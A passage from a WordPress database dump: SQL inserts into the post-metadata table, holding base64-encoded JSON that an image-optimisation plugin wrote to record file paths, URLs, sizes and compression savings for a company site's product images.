ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvY2F0YWxvZy0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU5MTU4NiwiaWQiOjI3fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvY2F0YWxvZy0xMTR4MTMwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NhdGFsb2ctMTE0eDEzMC5qcGciLCJ3aWR0aCI6IjExNCIsImhlaWdodCI6IjEzMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9jYXRhbG9nLTExNHgxMzAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTkxNTg4LCJpZCI6Mjd9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jYXRhbG9nLTE4MHgxODAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvY2F0YWxvZy0xODB4MTgwLmpwZyIsIndpZHRoIjoiMTgwIiwiaGVpZ2h0IjoiMTgwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2NhdGFsb2ctMTgweDE4MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1OTE1OTAsImlkIjoyN31d'); 
INSERT INTO `wp_postmeta` VALUES (30441, 26, 'wpfc_optimisation_reduction', '48486'); 
INSERT INTO `wp_postmeta` VALUES (30442, 26, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvYnVsYi5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2J1bGIuanBnIiwid2lkdGgiOjMwMCwiaGVpZ2h0IjoyMjgsIm1pbWVfdHlwZSI6IiIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9idWxiLmpwZyIsInJlZHVjdGlvbiI6NDg0NzksInRpbWUiOjE0ODM1OTE1OTcsImlkIjoiMjYifSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2J1bGItMjUweDIyOC5qcGciLCJ3aWR0aCI6MjUwLCJoZWlnaHQiOjIyOCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9idWxiLTI1MHgyMjguanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvYnVsYi0yNTB4MjI4LmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU5MTU5OSwiaWQiOjI2fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2J1bGItMjAweDIwMC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjIwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9idWxiLTIwMHgyMDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvYnVsYi0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU5MTYwMSwiaWQiOjI2fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2J1bGItMjI1eDIyNS5qcGciLCJ3aWR0aCI6MjI1LCJoZWlnaHQiOjIyNSwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9idWxiLTIyNXgyMjUuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvYnVsYi0yMjV4MjI1LmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU5MTYwMywiaWQiOjI2fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvYnVsYi0xMTR4MTMwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2J1bGItMTE0eDEzMC5qcGciLCJ3aWR0aCI6IjExNCIsImhlaWdodCI6IjEzMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9idWxiLTExNHgxMzAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTkxNjA1LCJpZCI6MjZ9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9idWxiLTE4MHgxODAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvYnVsYi0xODB4MTgwLmpwZyIsIndpZHRoIjoiMTgwIiwiaGVpZ2h0IjoiMTgwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2J1bGItMTgweDE4MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1OTE2MDcsImlkIjoyNn0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2J1bGItMjQ3eDIyOC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9idWxiLTI0N3gyMjguanBnIiwid2lkdGgiOiIyNDciLCJoZWlnaHQiOiIyMjgiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvYnVsYi0yNDd4MjI4LmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU5MTYwOSwiaWQiOjI2fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvYnVsYi0zMDB4MjI4LmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2J1bGItMzAweDIyOC5qcGciLCJ3aWR0aCI6IjMwMCIsImhlaWdodCI6IjIyOCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9idWxiLTMwMHgyMjguanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTkxNjExLCJpZCI6MjZ9XQ=='); 
INSERT INTO `wp_postmeta` VALUES (30443, 25, 'wpfc_optimisation_reduction', '59923'); 
INSERT INTO `wp_postmeta` VALUES (30444, 25, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvdGVmbG9uLWxvZ28uanBnIiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC90ZWZsb24tbG9nby5qcGciLCJ3aWR0aCI6NDA0LCJoZWlnaHQiOjQwNCwibWltZV90eXBlIjoiIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3RlZmxvbi1sb2dvLmpwZyIsInJlZHVjdGlvbiI6NTk4ODQsInRpbWUiOjE0ODM1OTE2MTksImlkIjoiMjUifSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3RlZmxvbi1sb2dvLTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvdGVmbG9uLWxvZ28tMzQweDM0MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC90ZWZsb24tbG9nby0zNDB4MzQwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU5MTYyMSwiaWQiOjI1fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3RlZmxvbi1sb2dvLTI1MHgyNTAuanBnIiwid2lkdGgiOjI1MCwiaGVpZ2h0IjoyNTAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvdGVmbG9uLWxvZ28tMjUweDI1MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC90ZWZsb24tbG9nby0yNTB4MjUwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU5MTYyMywiaWQiOjI1fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3RlZmxvbi1sb2dvLTIwMHgyMDAuanBnIiwid2lkdGgiOjIwMCwiaGVpZ2h0IjoyMDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvdGVmbG9uLWxvZ28tMjAweDIwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC90ZWZsb24tbG9nby0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU5MTYyNSwiaWQiOjI1fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3RlZmxvbi1sb2dvLTIyNXgyMjUuanBnIiwid2lkdGgiOjIyNSwiaGVpZ2h0IjoyMjUsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvdGVmbG9uLWxvZ28tMjI1eDIyNS5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC90ZWZsb24tbG9nby0yMjV4MjI1LmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU5MTYyNywiaWQiOjI1fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvdGVmbG9uLWxvZ28tMTE0eDEzMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC90ZWZsb24tbG9nby0xMTR4MTMwLmpwZyIsIndpZHRoIjoiMTE0IiwiaGVpZ2h0IjoiMTMwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3RlZmxvbi1sb2dvLTExNHgxMzAuanBnIiwicmVkdWN0aW9uIjozMSwidGltZSI6MTQ4MzU5MTYyOSwiaWQiOjI1fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvdGVmbG9uLWxvZ28tMTgweDE4MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC90ZWZsb24tbG9nby0xODB4MTgwLmpwZyIsIndpZHRoIjoiMTgwIiwiaGVpZ2h0IjoiMTgwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3RlZmxvbi1sb2dvLTE4MHgxODAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTkxNjMyLCJpZCI6MjV9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC90ZWZsb24tbG9nby0yNDd4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3RlZmxvbi1sb2dvLTI0N3gzMDAuanBnIiwid2lkdGgiOiIyNDciLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvdGVmbG9uLWxvZ28tMjQ3eDMwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1OTE2MzQsImlkIjoyNX0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3RlZmxvbi1sb2dvLTMwMHgzMDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvdGVmbG9uLWxvZ28tMzAweDMwMC5qcGciLCJ3aWR0aCI6IjMwMCIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC90ZWZsb24tbG9nby0zMDB4MzAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU5MTYzNiwiaWQiOjI1fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvdGVmbG9uLWxvZ28tNDAweDQwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC90ZWZsb24tbG9nby00MDB4NDAwLmpwZyIsIndpZHRoIjoiNDAwIiwiaGVpZ2h0IjoiNDAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3RlZmxvbi1sb2dvLTQwMHg0MDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTkxNjM4LCJpZCI6MjV9XQ=='); 
INSERT INTO `wp_postmeta` VALUES (30445, 17, 'wpfc_optimisation_reduction', '13940'); 
INSERT INTO `wp_postmeta` VALUES (30446, 17, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvQmVhcmluZ3MtMS5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0JlYXJpbmdzLTEuanBnIiwid2lkdGgiOjM4ODgsImhlaWdodCI6MjU5MiwibWltZV90eXBlIjoiIiwiZXJyb3JfY29kZSI6OSwidGltZSI6MTQ4MzU5MTY0MywiaWQiOiIxNyJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvQmVhcmluZ3MtMS0zNDB4MzQwLmpwZyIsIndpZHRoIjozNDAsImhlaWdodCI6MzQwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0JlYXJpbmdzLTEtMzQweDM0MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9CZWFyaW5ncy0xLTM0MHgzNDAuanBnIiwicmVkdWN0aW9uIjo2NDYsInRpbWUiOjE0ODM1OTE2NDYsImlkIjoxN30seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9CZWFyaW5ncy0xLTgwMHg1MzMuanBnIiwid2lkdGgiOjgwMCwiaGVpZ2h0Ijo1MzMsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvQmVhcmluZ3MtMS04MDB4NTMzLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0JlYXJpbmdzLTEtODAweDUzMy5qcGciLCJyZWR1Y3Rpb24iOjEwMDksInRpbWUiOjE0ODM1OTE2NTAsImlkIjoxN30seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9CZWFyaW5ncy0xLTc2OHg1MTIuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1MTIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvQmVhcmluZ3MtMS03Njh4NTEyLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0JlYXJpbmdzLTEtNzY4eDUxMi5qcGciLCJyZWR1Y3Rpb24iOjk2NSwidGltZSI6MTQ4MzU5MTY1NCwiaWQiOjE3fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0JlYXJpbmdzLTEtMTYwMHgxMDY3LmpwZyIsIndpZHRoIjoxNjAwLCJoZWlnaHQiOjEwNjcsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvQmVhcmluZ3MtMS0xNjAweDEwNjcuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvQmVhcmluZ3MtMS0xNjAweDEwNjcuanBnIiwicmVkdWN0aW9uIjozMzE5LCJ0aW1lIjoxNDgzNTkxNjU5LCJpZCI6MTd9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvQmVhcmluZ3MtMS0yNTB4MjUwLmpwZyIsIndpZHRoIjoyNTAsImhlaWdodCI6MjUwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0JlYXJpbmdzLTEtMjUweDI1MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9CZWFyaW5ncy0xLTI1MHgyNTAuanBnIiwicmVkdWN0aW9uIjo1ODksInRpbWUiOjE0ODM1OTE2NjIsImlkIjoxN30seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9CZWFyaW5ncy0xLTIwMHgyMDAuanBnIiwid2lkdGgiOjIwMCwiaGVpZ2h0IjoyMDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvQmVhcmluZ3MtMS0yMDB4MjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0JlYXJpbmdzLTEtMjAweDIwMC5qcGciLCJyZWR1Y3Rpb24iOjUyOCwidGltZSI6MTQ4MzU5MTY2NiwiaWQiOjE3fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0JlYXJpbmdzLTEtMjI1eDIyNS5qcGciLCJ3aWR0aCI6MjI1LCJoZWlnaHQiOjIyNSwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9CZWFyaW5ncy0xLTIyNXgyMjUuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvQmVhcmluZ3MtMS0yMjV4MjI1LmpwZyIsInJlZHVjdGlvbiI6NTU5LCJ0aW1lIjoxNDgzNTkxNjY5LCJpZCI6MTd9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvQmVhcmluZ3MtMS01MTB4NjAwLmpwZyIsIndpZHRoIjo1MTAsImhlaWdodCI6NjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGx